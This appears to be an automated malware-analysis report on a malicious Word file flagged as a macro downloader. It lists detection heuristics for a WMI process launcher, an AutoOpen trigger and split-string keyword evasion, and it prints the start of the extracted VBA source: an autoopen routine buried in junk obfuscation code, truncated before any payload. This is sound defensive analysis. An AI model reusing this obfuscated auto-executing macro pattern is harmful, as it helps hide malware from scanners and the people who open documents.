Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The sample is a malicious Office document containing obfuscated VBA macros. The macros use GetObject and CreateObject to reach WMI through the winmgmts: moniker and launch a process, which indicates an attempt to execute arbitrary code. This is a common technique for downloading and executing further stages of malware.
Heuristics (8)
- ClamAV: Doc.Downloader.00536d-6940733-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6940733-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58498 bytes |

SHA-256 (macros.bas): db36abe1943a4bf486d2fc51b751fef306f467e48cef52edfd451ac49ff8a292
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "VDBGABcZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AAAUXQcA"
Attribute VB_Base = "0{41B80301-4F30-4DFF-9E13-FF01FAAE48FC}{D3CACD97-8909-4E1C-A8B5-B5BB877E6850}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UAC4AA"
Attribute VB_Base = "0{189A0FF8-4D96-4B19-97D3-01F9E2211D01}{F88DC55B-ECC5-41AE-8FAD-B6A803EAC6A8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "hAAAQA"
Sub autoopen()
If CABxZA = zZQXZADA Then
Select Case KAAU4x_D
Case 824423980
JGQxCX11 = 541953637
B1_AQAA = ZBkw4cDU
WAACAAw = Asc(197431235 + Log(566296674 - Rnd(SAoAQC)) / 230159009 + Oct(361161562))
Case 260274818
iQDABA = rBQcGQkD
bQw4UkG = rxkDABA
dXwAA4U = CDate(507087702 - Cos(582724791 * Rnd(930168264) + 184544308 * 198050860) * dAAXAAA / Round(240484163))
Case 954027194
dAUwZkQ1 = YXAA4oXQ
OAABAQ = CStr(687146031)
dAwAAw = Atn(693080714 + Atn(8532107) * qAoAAD * CDate(WAA4Uw + 36 + UZAQCA_ / CStr(XA14ZA)))
End Select
End If
If UAZw4Z = PAAkUwU Then
Select Case MGAA_4wU
Case 662399757
fADAAAA = 886185252
fA4DQ4B = AUQAAxD
m1ACxUxZ = Asc(561466704 + Log(82608497 - Rnd(uQAAAxA)) / 80918609 + Oct(687553194))
Case 998728333
O_AAcAwA = HZAGAAA
nACko4 = zAQAAo
bBCZkBAA = CDate(507539159 - Cos(383013148 * Rnd(424800738) + 346047071 * 961173696) * BUCAUAD1 / Round(466825800))
Case 324182574
o4AU4A = SDQAAA
ZX1A4AQ = CStr(839175312)
jDXAZX = Atn(957733703 + Atn(592807201) * ScA4c1Z * CDate(BAcAAQ1 + 36 + icB14DAA / CStr(f4cA1A)))
End Select
End If
If NABA4GXQ = DADAUBAA Then
Select Case vAQAXA
Case 811608193
SUAZBDA = 203267347
XDUAGACx = iABGcxkA
XBcXAUAw = Asc(252737846 + Log(853717231 - Rnd(lAAAwAk)) / 702600719 + Oct(252830482))
Case 112938340
wDQAQBC = ZQ4DZo1X
iUxQGABA = rGAZQA
vUAoccw4 = CDate(736973785 - Cos(45942889 * Rnd(723496360) + 936787964 * 841547363) * RQAAQBA / Round(680824439))
Case 38404462
rAwkQwQA = SUUxAA
DD1AAcUA = CStr(349544721)
zxDwDAAU = Atn(626779698 + Atn(494500476) * VwZcAxA * CDate(QoCA4ZAw + 36 + tAA1ccZA / CStr(hc1BCoDA)))
End Select
End If
fACBDG4A
If BCAZAG = uCX1BG4Q Then
Select Case aBA4oAAA
Case 237027961
J1AcAAU = 725651001
JAUBBUkB = iAA4DxAD
bADUUAA = Asc(297422216 + Log(719513665 - Rnd(pAxABA)) / 744389716 + Oct(303320506))
Case 438840034
DAxAAQ = z1ACAA
GAABBC = Jw1Q1UQG
TBUABZG = CDate(601632226 - Cos(233712794 * Rnd(916568828) + 167053570 * 107627104) * JUAUkCw / Round(126606403))
Case 668598851
qADB1ZcA = pAAAAAw
jDAUABD = CStr(408859490)
LAXAAQAB = Atn(764118703 + Atn(937464247) * wAXUA1 * CDate(qcAxBA + 36 + oAwDADA / CStr(YABBB_Q)))
End Select
End If
If wGBkAX = uQQUXUAA Then
Select Case wAAB4wAQ
Case 294513077
aA_Q4B = 479579391
iABUBA = GAACZkAA
DAUGoXB = Asc(375555191 + Log(615128457 - Rnd(iBcCAk)) / 337159818 + Oct(867101891))
Case 561078452
iAAwAwxA = qZA4DA
... (truncated)
```